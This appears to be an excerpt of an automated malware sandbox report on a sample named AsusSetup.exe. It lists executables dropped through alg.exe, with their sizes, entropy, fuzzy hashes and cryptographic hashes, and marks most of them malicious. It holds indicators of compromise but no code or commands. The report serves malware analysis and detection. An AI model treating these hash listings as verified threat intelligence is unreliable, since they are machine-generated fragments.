                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:543E3A1E743140A192E3FED9FEF37BD3496771EE4F662E193F572A898DC20C439764375BE5707692634C7C6258AE66AC29A47916028A64DA66BFBCB6379304C0
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):27533312
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.24820618603424
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:196608:bhRrmpGpGdJM7Hbp8JfrCGvqYYuNDmoefAlprtPz25HqaI6HMaJTtGbQOzF9:bhRCpGpMJMrbp8JjpNdNlc5+9
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:430C9B4AB54F2570B4182F56F9FFDBB6
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:5BA011CAD0FCAEC1E3280C6AEB530139DE68A9A1
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:652883FDBC8EE2D2C8715AC4CA15B038FAAD6E1511C474C2BF6C2F4E0A7EBCC0
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:1DC5200692EB08B84045600D411654985D999BF0EE64F7585D392C8B9746BB0EEA275E4082D98EC40FB7DAC3E109760A1A2102BD156F6FB2F3EC2B77341CB427
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):2199552
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.7840197941349025
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:o83pZ3kd0CuEeN0LUmRXzYs65mnLNiXicJFFRGNzj3:kKuUQY15M7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:B45D132B56137C1DE2375477F45BD2B9
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:1F07D72E7A2BAD9E3B660DDC1B5A952113EABE9C
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:AE23CBD575E55798835279BFFC2D603F7F84CB04092FCC35FC17AEF048871183
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:081746E5D90B1C6D752F2F13333A7E0BFE64A605283463A502F5A744D2CB778EB2ADD831F428A24F992FFA67047CB580D9F72C5F0E410DDCFECAA94542E4C8AD
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):4971008
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.6689845076456455
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:1Erw1zDb1mZtOoGpDYdSTtWXy4eqH8nYAmoBvYQugWupoI6bAGOpndOPcptz6+Mr:jA4oGlcR+glEdOPKzgVZ17wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:ACA2C209CD9F56090E1ED8E19F7F3057
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:1F24708F483095B73C4014E49CA929B0DD2A6D1F
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:FD1238579344DACC2D0528BFD0D3B2726DB85E84B23B49B1C653F9E9D7C97504
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:7D72849D95BDC4F1E62D4DB1E165BED2F28CFB846991136BD61E0AF3BE22C90BF38BC7106066A6F5BA256E5E86423FB62F39030D177459D89A9C3358642709E7
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):4897792
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.828099811403021
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:V8ErxqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgKI:Qv2gM+qwXLg7pPgw/DSZH37wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:8C84AE61AE726B521C6DE04A37CFAFB7
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:EBFCEBE748D3428BD662748EA9DCEB3F4C92112B
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:F1CF6C910BFE4A1E3FBADED02DFF2302A996828D76DBC797A6B5FC379CC9C0A4
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:C487D3186D830031465EBAC6958C3FBAB6A4BE0CA9D2A7E700DD71CC7439610D156F1565A8FE5A4210D38A1A3DB269669A4E9ABEA3E1EBE8B6CB4056F797F1F2
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):4897792
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.828098691417954
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:58ErxqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgKI:Uv2gM+qwXLg7pPgw/DSZH37wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:076312A2DC15FFB5870041BBEBE274B0
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:804B928033F90F30AAAD87C90BFEC70DA4DE49F4
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:9629FAD6638ADD9279A769600A1DB33D21E1B9F881BC376249D01678BA710D57
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:CCA608190E1E58669593BE5C2771FEA7B07E544C2BDCC9496827742FEE4D746BC9225008E778A7CF73099A03AFED2C607F9CA37D8B03120C4F28E6C0F0E4CF1D
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):2156544
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.9491268970314195
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\AsusSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):2370560
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.028781188229773
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1984512
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.099941765255825
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1779712
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.153149455903381
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1533952
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.9367341472557005
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1286656
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.216785417433258
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:fsFfc1VyFn5UQn652bO4Hg/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:fsFcIn5rJOLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:B16924AF8BC8D17257EC7700DE937375
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:6E4BA30552BD2B7D0FA547BF22FA77D97477A0B5
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:1B5954F5FFFC99C5C796705DFF08ED35B12487C8FD409A397B3ADDF4ABAD0B44
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:6A60C4D8EB6FC0AE2347B663A9CBC600A7C6925BFC97C7B8FEF5AA879ABB70AEDD52AE70035E5E2334FC9B245BFA33365FB6F47AC8A1A064D2B0476832856070
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1246208
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.4881079064592155
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:jt9o6p4xQbiKI69wpemIwpel97/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:jt9faQbtl2peapelBLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:85241E3070BDA379F8D81E283D8440AE
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:C04294A925FB3A019177314F8F2C2C31D7C138CB
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:BF96C1C84EE634EC30A07160D9AA28D326C3B97C9A678A5487D5398E59BA8DA8
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:EFC3B6037BF804D18A2C8C22E9F157856A33F182CF80EBCC69376561043B4EFF8C66FFAA95D290F0803C6443A62DAF2EB5C84E468F20B0FE1D4A5764300C53DF
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1512448
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.901599586667003
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:MQVTZu0JY/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:DVTZuRLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:267E7C429192F3C7A3E3B9823A74ABFB
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:55AC59DE6CEC4B65148A64792D6CA15D85BB465D
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:0498A5895DC7A7FF67020AF06B9005A65D3F0D82F63D8CCCAC67CFD446BB2AC5
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:CC7AAA1D23199DF549A196188B8E489A23809D16CBEF982FB2E05198AE0F4A239249A084D1CF06CAFF27E3BDA05DAF641B3C6A3D0DA5290EA60BA504FB97AC77
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1344000
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.801608975661588
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:zC1vpgXcZHze/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:zC1vpIcNeLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:69658BB2F08508299FC4ADBFB7AB95C3
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:15A89757E91AAFDDD03847B2334D489315D45389
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:E3F848A51B3F4118CFD4CF0AD17360C5CAF57AA9AD86C439D0ABFDBD356C12B0
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:29CB4B6597BEBE968EA17550549BF58499B7A4B2C2CE57E1552F7A96A24CF148174B1615FB96989D9CAA3AC3AEDEE56F8BBD53D4F4FDA1BA60A94A63A799588A
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1355776
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.655507668913019
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:dcC/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:LLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:E3EB351CB9F9E5F6358431341D17FD6F
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:CBDC523E86A452601A550AB6325BF9CC5E0293CC
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:3CED139A6700724FA65DB86D49271A3F3A79E3021954DE06A7DC665926CC25BD
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:BF276902FE6C9D1FD1C64CC2A91CB4A72D14FCFF6FF398BBECB383EDFA6075D421D785ABD58B306A2A13DF82CA7BAB019B541AC57207FA16F50138D4AB5A8D2C
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1564160
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.005844464611706
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:dWLntIfGpI/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:ERIeGLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:70E36F3EE85DCC5CA01169074BF457CD
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:B48DCFE285361BBA82CE16F2573C48F5F04FC7E3
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:095645AFCB345C476BEE4EFC905BCAAD3DF07B8EBC8F9A05B933BDDC24446CD3
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:2FE241D2759B4137F02647634F3ED7378F8538553004B73DB2FDFD2FD416BD73E07DC8D0AC7749FA61DD0D6706BF393D54C2C394898EB444529458249B3526FB
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1340928
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.616074321463117
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:zIhciJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:im/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:EF86EAAE750ADF36B3A610E1EC6672AC
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:37FA9DEE20A2994BADB90E5835DED3CCDDC14B8E
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:7FD28D7ABF6FFD3A6B90AEC4F55F0BB5DF2E70C241699481D78BEA67AB8D40E6
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:339D89085B472521F7F3C4A6B24A3511C2D9F89805279A33E76D698EFA7F001FA87F4B8238F1EC50A9D441B82E3B81C473D38DFCF0B9A019C44F57BED5BE7E64
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1687552
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.018642981028978
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:a8oRcwt2ioQ3J+Rr/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:a8oRBoFrLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:2ABCEE9773CE77DBBB8BB75C65B49253
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:2D7E879710CF84E773A896EA2C0514609F8169BF
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:B8979FD640E348AF42655AC2D3182EA160ABF2B3B312CFF025301256C5AA6436
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:BE065C07A018A59F4FFC1B05920764AEC875489FB9A2F0D6722923F7547D5CBEA780F6F2DD394E98E6C7FF49070AB6CD9F716BD7BECB5EC175538F44970DFC56
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\AsusSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):12320
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.985020614765465
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:IYGt5eicwZCTYOuyyCL3XqikaOeibTzSXxbbNLD30MMY8lYD6s+OOcXX8A1ghRz2:IYUeicwQuy/5kXHSBbbRDkMv/R2z9W6A
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:40EBCF90DAA58AA95B9EF6B38150AF45
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:558899812B595239E1DDB3BE930DEDC2F7C2F575
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:D7DA94BB7260ADCDB51E59ED70A1B0FC3245D30D105D6A3B5FCC574B83EC61CE
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:97ABD913D2A578F7A59381E434701CCD068225A13F310D58C1C843DB6A12A2C54E28EA0605ADE789D630EA9A792C13C2F6AFF33AC0BB20AC496958FF9BACECEC
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\AsusSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1348608
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.246049721656164
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:yQW4qoNUgslKNX0Ip0MgHCpoMBOuZ/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:yQW9BKNX0IPgiKMBOuZLNiXicJFFRGNf
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:2148D94316FBFFE84543113C6A3C1FA4
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:E586090B044D7F5AFC2FE180C2DB5520D063EF40
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:A513D27486875542541E080BC08A707DBA71F9D88E0953512619631D0ED797FA
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:03FA2707BF34AFF27BDF1E6B098F21CA9E1C4B816A086E1C0A67CFDC07E63A85E841E81539A8D266B5346AD30DA35E38A1356D49EC0616782D8A6A8E1D245832
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\AsusSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1379840
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.686024492296295
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:t2G7AbHjk6/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:t2G7AbHjDLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:515BCDF27D7CB2B02C2977222AEB63DA
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:2A093BDE624DFE636447060ACE6F83C967C97C5F
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:66D9120AD6ED3B96F428ECB779D7602ACB4EACAEB925BC0A854D0902C741FD2C
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:FD8459ED139CA99AB0A8143BF3FA42E464E9A3A4C3E8969D89B6DDC53092727BB5DBB10DDAA40018216742474F158FD2D0C1F16DEA7E93FDB92B0B4A346F320F
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\AsusSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1242624
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.283007833571848
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:CkdpSI+K3S/GWei+qNv2uG3y/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:C6SIGGWei2uG3yLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:5E3D1E384655DE6087F47BBB3A38FB17
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:05169F30603E2F7CB3AB500A27716EFAFBF348A4
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:0664F583DA06764F7EF99AE223D6E7D89FDA6373AC7873C1FF65732BAE6046F9
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:FD68526418071F26F69F7DB314039E452308B497F07FE62B1A9422196098447822EC3B5ACB8396A516CA3C9920F088340219FE4D369C35D223E20C52CA7F1BD0
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\AsusSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1381376
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.68641580355992
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:0rL/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:0rLLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:332F38054E08BAEC551611993C8D1317
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:AFB4ECC9705D0FCAEB8BF2D7942EF79649FCD205
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:2805D7B3356302E1A6367E60799038C9FAF4560435E4C3BBA5333D5AAEF5CD73
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:455B16AFCEE3FBB04D1D4A1AC106F895E9AF68283F69FC4818DC353368BEA283BFBE3FC9F3C9B1B8EC6BFA0DB187C5AEB744A66C217ED32E35D1C57C1AC713A1
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):12320
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.984912691211584
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:6wKQAAcFjV/42kX3z0cdmsaLq7InUPORSj:BKQ52ez0cfQUqSj
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:4C758112062B3AF393AF3F7CFBB2F0F3
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:08C20726A5185C5AF559D485B960B6A8F993372A
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:17224CA1541A5406A6C839F112E7F60F629BFF28DD1076EEB2C032EAA8958309
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:B3123A1EDBDF2D79F2C65618FAEE72AA343E2568A704F593FF29948CBA81EE554286C519F42ACF54E28802EC0C9453D4B3BBE66193EC5A2A92C4BF9A7277643B
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\AsusSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:modified
